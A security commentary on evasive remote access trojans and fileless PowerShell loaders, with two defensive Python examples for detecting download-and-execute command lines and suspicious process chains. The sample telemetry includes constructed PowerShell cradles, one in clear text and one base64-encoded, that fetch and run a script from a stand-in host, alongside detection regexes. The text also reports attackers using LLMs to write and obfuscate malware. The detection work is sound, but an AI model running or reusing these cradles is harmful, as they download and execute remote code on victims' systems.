Top Highlights
- Evolving RATs: Remote Access Trojans (RATs) like StilachiRAT and SnowDog RAT are becoming stealthy threats, using obfuscation methods to remain undetected on enterprise systems.
- Innovative Attack Techniques: Cybercriminals are leveraging native system tools and simple scripts to deploy sophisticated malware, exploiting inherent trust in these tools to bypass traditional defenses.
- Architectural Vulnerabilities: Enterprises are susceptible due to fragmented security architectures, where uncoordinated endpoint, identity, and network protections allow persistent access for attackers without triggering alerts.
- Shift to Behavior Detection: A paradigm shift towards behavior-driven security, focusing on detecting intent and unusual activities, is crucial to defend against evolving threats efficiently.
COMMENTARY
Remote access Trojans (RATs) are no longer just blunt instruments for cybercriminals. They’ve become more elusive, quietly shaping a new chapter in enterprise threats. Recent strains like StilachiRAT and SnowDog RAT are using corrupted DOS and PE headers to hide in plain sight, persisting undetected on enterprise systems for extended periods.
Meanwhile, attackers have returned to using simple Windows batch files to launch sophisticated payloads like Quasar, taking advantage of the implicit trust in native system tools. This shift reflects a broader trend: attackers innovate not through complexity but through stealth, using everyday file formats and obfuscation tactics that slip past traditional defenses.
Architectural Blind Spots Leave Enterprises Exposed
Today’s RATs don’t just exploit technical vulnerabilities. They also take advantage of the blind spots created by how enterprise architects establish their security environments.
Our threat researchers recently dug into Remcos RAT, a potent malware tool that gives attackers remote control over infected systems. It often spreads through phishing emails with harmful attachments. Cybercriminals use it to:
- Record keystrokes and screen activity
- Steal login information and private data
- Persist in the infected system
We saw recent attacks that used PowerShell-based loaders to install Remcos without writing files to disk. Living-off-the-land (LotL) and in-memory execution, particularly when leveraged through PowerShell, represent a potent and stealthy approach for threat actors to execute malicious commands and scripts directly in the system’s memory without writing them to disk. This “fileless” technique significantly reduces the attack footprint, making it very difficult for traditional, signature-based antivirus solutions to detect. Attackers exploit PowerShell’s native capabilities, such as Invoke-Expression or Invoke-WebRequest, to download and immediately execute payloads or entire scripts from remote servers, often in heavily obfuscated form to evade detection. This combination of LotL, in-memory execution, and PowerShell’s inherent trust facilitates evasion, persistence, and lateral movement within compromised networks.
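As an added illustration of how a defender can triage such loaders from process-creation telemetry (example code written for this commentary, not from the research described above), the following Python scores PowerShell command lines for the fetch-and-execute pattern and decodes any -EncodedCommand payload so the obfuscated form is judged on the same evidence as the clear-text one. The sample command lines and the example.invalid URL are constructed.

```python
import base64
import re

# Constructed sample command lines standing in for process-creation telemetry
# (e.g. the CommandLine field of Sysmon Event ID 1). Hypothetical, not real captures.
SAMPLE_COMMAND_LINES = [
    # 0: routine administrative use
    "powershell.exe -File C:\\Scripts\\Rotate-Logs.ps1",
    # 1: clear-text download-and-execute cradle with evasion switches
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a.ps1')\"",
    # 2: the same intent hidden behind -EncodedCommand (base64 of UTF-16LE text)
    "powershell.exe -NoProfile -EncodedCommand "
    + base64.b64encode("iwr http://example.invalid/b.ps1 | iex".encode("utf-16-le")).decode(),
]

# Behaviours the commentary names: run-a-string (Invoke-Expression), fetch-from-network
# (Invoke-WebRequest / WebClient), plus the switches loaders use to stay quiet.
INDICATORS = {
    "execute_from_string": re.compile(r"\b(invoke-expression|iex)\b", re.I),
    "network_fetch": re.compile(
        r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloadfile)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "no_profile": re.compile(r"-no?p(rofile)?\b", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I),
}

def decode_encoded_command(command_line):
    """Return the text behind -EncodedCommand, or None when absent or malformed."""
    match = INDICATORS["encoded_command"].search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # undecodable blob: nothing to scan, but the switch itself is still a hit

def triage(command_line):
    """Indicator names found in the command line and in any decoded -EncodedCommand payload."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(command_line)}
    decoded = decode_encoded_command(command_line)
    if decoded:
        hits |= {name for name, rx in INDICATORS.items() if rx.search(decoded)}
    return hits

def is_download_cradle(command_line):
    """Intent-level verdict: fetching from the network combined with executing a string."""
    return {"execute_from_string", "network_fetch"} <= triage(command_line)
```

Run over real telemetry, the verdict should feed a correlation rule rather than block on its own, since legitimate automation also fetches and runs scripts.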
Attackers are rapidly leveraging artificial intelligence (AI), particularly large language models (LLMs), to escalate the scale and sophistication of their malware operations. AI helps them generate highly convincing phishing lures, craft more effective social engineering schemes by analyzing target profiles, and automate aspects of attack campaigns. Crucially, LLMs are being used to write and refine PowerShell code for malware. This includes generating entire malicious scripts from scratch and, importantly, enhancing existing malware with advanced obfuscation techniques that make detection more difficult. This adaptability lowers the barrier to entry for less skilled cybercriminals and accelerates the development of more evasive and resilient threats.
Persistent Access, Silent Damage
These stealthy RATs often maintain persistent access for weeks, allowing data exfiltration to occur without triggering any of the typical alerts. In one example, a batch file RAT infiltrated multiple remote locations and moved laterally into core applications and identity systems, quietly collecting sensitive information. Fragmented security architectures, where endpoint, identity, and network protections operate independently, give attackers unprecedented room and time to operate unnoticed. Even organizations with solid compliance programs can find themselves vulnerable if telemetry is not unified or actionable.
Behavior Is the New Perimeter
To combat this growing threat, defenders need a paradigm shift in their security approach. Models that rely on perimeter defenses and static rules cannot keep up with adversaries who repurpose legitimate tools for malicious ends. A behavior-driven strategy is essential, one that focuses on detecting intent rather than simply matching known signatures. Achieving this requires integrating technologies like Unified SASE as a Service, security information and event management (SIEM), endpoint detection and response (EDR), and network analytics to gain a more contextual view of activity across the environment.
Investing in tools that monitor how processes behave, not just which files are running, is the recommended course. Unusual privilege escalation or abnormal process relationships often indicate malicious activity. Enhancing visibility into outbound traffic through network telemetry and deep packet inspection helps identify obfuscated command-and-control (C2) communication.
By correlating data across endpoints, identity systems, and network layers, teams can uncover lateral movement and unauthorized access. Regular threat hunting exercises focused on RAT techniques — such as registry changes or persistence mechanisms — can expose hidden threats. And controls over system-native binaries should be tightened, ensuring these tools are used only within approved workflows.
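To show what hunting for abnormal process relationships and restricting native binaries to approved workflows can look like in practice, here is an added example (not from the original commentary) that walks constructed Sysmon-style process records, reconstructs each script host's ancestry, and flags chains that start in a user-facing application or run a script from a user-writable path. The agent.exe allow-list entry and all records are hypothetical.

```python
import ntpath

# Constructed process-creation records shaped like Sysmon Event ID 1 fields (hypothetical sample, not a capture).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\OUTLOOK.EXE", "cmd": "OUTLOOK.EXE"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmd": r'cmd.exe /c "C:\Users\jdoe\AppData\Local\Temp\invoice.bat"'},
    {"pid": 400, "ppid": 300, "image": PS, "cmd": "powershell.exe -nop -w hidden -c <payload omitted>"},
    # Approved workflow: a hypothetical management agent launches PowerShell for patching.
    {"pid": 500, "ppid": 1, "image": r"C:\Program Files\CorpMgmtAgent\agent.exe", "cmd": "agent.exe"},
    {"pid": 600, "ppid": 500, "image": PS, "cmd": r"powershell.exe -File C:\ProgramData\Patch\apply.ps1"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_FACING = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe", "chrome.exe", "msedge.exe"}
APPROVED_PARENTS = {"agent.exe"}  # assumption: the only parent allowed to launch script hosts
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\downloads\\", "\\appdata\\")

def lineage(by_pid, pid):
    """The process record followed by its ancestors, nearest parent first."""
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def runs_script_from_user_path(event):
    """True when the command line names a script sitting in a user-writable location."""
    cmd = event["cmd"].lower()
    return any(ext in cmd for ext in (".bat", ".cmd", ".vbs", ".ps1")) and any(p in cmd for p in USER_WRITABLE)

def hunt_script_host_chains(events):
    """Return findings for script hosts whose ancestry is not an approved workflow."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        chain = lineage(by_pid, event["pid"])
        names = [ntpath.basename(e["image"]).lower() for e in chain]
        if names[0] not in SCRIPT_HOSTS or (len(names) > 1 and names[1] in APPROVED_PARENTS):
            continue  # not a script host, or launched by an approved parent
        reasons = []
        if USER_FACING & set(names[1:]):
            reasons.append("descends from a user-facing application")
        if any(runs_script_from_user_path(e) for e in chain):
            reasons.append("runs a script from a user-writable path")
        if reasons:
            findings.append({"pid": event["pid"], "chain": names, "reasons": reasons})
    return findings
```

In this sample the Outlook -> cmd.exe -> powershell.exe chain is flagged twice over while the agent-launched patch script is skipped, which is the approved-workflow distinction the text calls for.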
Looking Ahead
A more unified and behavior-aware approach to detection can significantly improve security outcomes. Reducing dwell time, improving the quality of alerts, and bridging the gaps between isolated systems all contribute to stronger overall resilience.